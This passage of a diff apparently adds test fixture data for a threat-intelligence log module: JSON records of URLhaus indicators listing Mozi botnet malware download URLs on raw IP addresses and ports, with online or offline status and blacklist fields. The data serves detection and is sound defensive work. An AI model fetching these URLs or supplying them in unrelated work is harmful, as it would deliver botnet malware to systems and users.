"threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "59.96.37.35", + "threatintel.indicator.first_seen": "2021-01-14T21:07:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "59.96.37.35", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://59.96.37.35:44359/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 44359, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961540/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 2136, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "42.239.233.17", + "threatintel.indicator.first_seen": "2021-01-14T21:07:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "42.239.233.17", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://42.239.233.17:56507/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 56507, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961541/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 2492, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "58.252.178.20", + "threatintel.indicator.first_seen": "2021-01-14T21:07:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "58.252.178.20", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://58.252.178.20:57562/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 57562, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961542/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 2848, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "45.176.111.95", + "threatintel.indicator.first_seen": "2021-01-14T21:07:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "45.176.111.95", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://45.176.111.95:48845/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 48845, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961539/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 3204, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "42.224.68.97", + "threatintel.indicator.first_seen": "2021-01-14T21:07:04.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "42.224.68.97", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://42.224.68.97:58245/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 58245, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961538/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 3558, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "222.81.144.207", + "threatintel.indicator.first_seen": "2021-01-14T21:06:08.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "222.81.144.207", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://222.81.144.207:37198/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 37198, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961537/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 3916, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.127.185.137", + "threatintel.indicator.first_seen": "2021-01-14T21:06:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.127.185.137", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://182.127.185.137:33524/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 33524, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961531/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 4276, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "39.84.175.185", + "threatintel.indicator.first_seen": "2021-01-14T21:06:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "39.84.175.185", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://39.84.175.185:48261/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 48261, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961532/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 4632, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "27.41.11.238", + "threatintel.indicator.first_seen": "2021-01-14T21:06:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "27.41.11.238", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://27.41.11.238:34478/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 34478, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961533/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 4986, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.127.133.68", + "threatintel.indicator.first_seen": "2021-01-14T21:06:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.127.133.68", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://182.127.133.68:35703/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 35703, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961534/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 5344, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "27.46.44.102", + "threatintel.indicator.first_seen": "2021-01-14T21:06:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "27.46.44.102", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://27.46.44.102:48666/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 48666, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961535/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 5698, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "39.70.88.65", + "threatintel.indicator.first_seen": "2021-01-14T21:06:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "39.70.88.65", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://39.70.88.65:53923/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 53923, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961536/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 6050, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "42.224.136.237", + "threatintel.indicator.first_seen": "2021-01-14T21:06:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "42.224.136.237", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://42.224.136.237:52794/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 52794, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961530/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 6408, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "117.208.135.63", + "threatintel.indicator.first_seen": "2021-01-14T21:05:34.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "117.208.135.63", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://117.208.135.63:49312/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 49312, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961525/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 6768, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "125.47.66.60", + "threatintel.indicator.first_seen": "2021-01-14T21:05:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "125.47.66.60", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://125.47.66.60:38961/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 38961, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961526/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 7122, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.117.95.148", + "threatintel.indicator.first_seen": "2021-01-14T21:05:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.117.95.148", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://182.117.95.148:50420/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 50420, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961527/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 7480, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "117.202.71.48", + "threatintel.indicator.first_seen": "2021-01-14T21:05:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "117.202.71.48", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://117.202.71.48:55007/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 55007, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961528/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 7836, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "125.99.132.118", + "threatintel.indicator.first_seen": "2021-01-14T21:05:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "125.99.132.118", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://125.99.132.118:51143/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 51143, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961529/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 8194, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.114.123.69", + "threatintel.indicator.first_seen": "2021-01-14T21:05:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.114.123.69", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://182.114.123.69:41003/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 41003, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961524/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 8552, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "116.19.127.37", + "threatintel.indicator.first_seen": "2021-01-14T21:04:38.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "116.19.127.37", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://116.19.127.37:35739/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 35739, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961523/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 8903, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "42.239.253.55", + "threatintel.indicator.first_seen": "2021-01-14T21:04:36.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "42.239.253.55", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://42.239.253.55:45653/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 45653, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961520/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 9254, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "103.217.121.228", + "threatintel.indicator.first_seen": "2021-01-14T21:04:33.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "103.217.121.228", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://103.217.121.228:41349/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 41349, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961521/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 9609, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "111.92.81.255", + "threatintel.indicator.first_seen": "2021-01-14T21:04:33.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "111.92.81.255", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://111.92.81.255:48586/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 48586, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961522/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 9960, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "45.229.55.75", + "threatintel.indicator.first_seen": "2021-01-14T21:04:33.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "45.229.55.75", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://45.229.55.75:38111/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 38111, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961518/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 10309, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.121.242.148", + "threatintel.indicator.first_seen": "2021-01-14T21:04:10.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.121.242.148", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://182.121.242.148:34556/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 34556, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961519/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 10662, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "106.115.189.249", + "threatintel.indicator.first_seen": "2021-01-14T21:04:10.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "106.115.189.249", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://106.115.189.249:59815/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 59815, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961516/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 11022, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "32-bit", + "elf", + "mips" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.117.93.110", + "threatintel.indicator.first_seen": "2021-01-14T21:04:08.000Z", + "threatintel.indicator.provider": "geenensp", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.117.93.110", + "threatintel.indicator.url.extension": "sh", + 